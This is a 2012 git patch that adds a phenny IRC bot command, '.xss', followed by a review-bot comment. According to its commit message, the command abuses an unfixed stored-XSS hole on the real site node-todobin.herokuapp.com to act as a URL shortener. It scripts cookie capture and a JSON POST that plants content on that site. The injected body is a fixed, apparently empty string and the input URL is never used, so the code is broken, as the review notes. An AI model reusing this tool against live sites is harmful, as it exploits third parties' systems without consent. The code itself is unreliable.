From eba2e5b8a36dcb543053ed669f81e12006c4e95d Mon Sep 17 00:00:00 2001
From: Calvin Winkowski
Date: Sun, 12 Feb 2012 04:32:16 -0500
Subject: [PATCH] Added url shortener using xss vulnerablity that owner refused to fix.

---
 modules/node-todo.py | 69 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 modules/node-todo.py

diff --git a/modules/node-todo.py b/modules/node-todo.py
new file mode 100644
index 0000000..d110adb
--- /dev/null
+++ b/modules/node-todo.py
@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+"""
+node-todo.py - node-todo uploader
+author: mutantmonkey
+author: telnoratti
+"""
+
+from urllib.error import HTTPError
+from urllib import request
+import web
+import json
+
+def xss(phenny, input):
+ """.xss - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
+
+ url = input.group(2)
+ if not url:
+ phenny.reply("No URL provided.")
+ return
+
+ if not url.startswith('http'):
+ url = ''.join(['http://', url])
+
+ try:
+ url = urlshortener(url)
+ except (HTTPError, IOError):
+ phenny.reply("THE INTERNET IS FUCKING BROKEN. Please try again later.")
+ return
+
+ phenny.reply(url)
+xss.rule = (['xss'], r'(.*)')
+
+
+
+def urlshortener(longurl):
+ xss = ''.join(["""{"status":false,"text":""}"""])
+ xss = xss.encode()
+ r = request.urlopen('http://node-todobin.herokuapp.com/list')
+ cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
+
+ r = request.Request('http://node-todobin.herokuapp.com/api/todos',
+ headers={
+ 'Content-Type': 'application/json',
+ 'Accept': 'application/json, text/javascript, */*',
+ 'Cookie': cookie,
+ }, data=b'{"id":null}')
+ opener = request.build_opener(request.HTTPHandler)
+ response = opener.open(r)
+ data = response.read()
+ js = json.loads(data.decode('utf-8'))
+ uri = js.get('uri')
+ url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
+ newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
+
+ request.urlopen(url)
+ request.urlopen(newurl)
+ r = request.Request(url,
+ headers={
+ 'Content-Type': 'application/json',
+ 'Accept': 'application/json, text/javascript, */*',
+ 'Cookie': cookie,
+ }, data=xss)
+
+ opener.open(r)
+
+ return newurl
+
+if __name__ == '__main__':
+ print(__doc__.strip())
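Review bot: `urlshortener` never reads its `longurl` parameter — the body sent on the final `request.Request(url, ..., data=xss)` is the fixed string assigned at the top of the function, so the `newurl` it returns carries no reference to the caller's URL and `.xss` replies with a link that has nothing to do with its input; either the parameter should be removed or the `.xss` docstring should describe what is actually returned. The line `cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]` raises `AttributeError` when the first response carries no `Set-Cookie` header, and `uri = js.get('uri')` feeds `None` into `'/'.join([...])` (a `TypeError`) when the API body lacks that key; neither is an `HTTPError`/`IOError`, so the handler in `xss()` does not catch them and the bot crashes instead of replying. `import web` is unused in this file. The whole function also depends on the current behaviour of a third-party site, so a comment above `def urlshortener`, e.g. `# Relies on undocumented node-todobin.herokuapp.com behaviour; breaks if the site changes.`, would tell the next maintainer why it stops working.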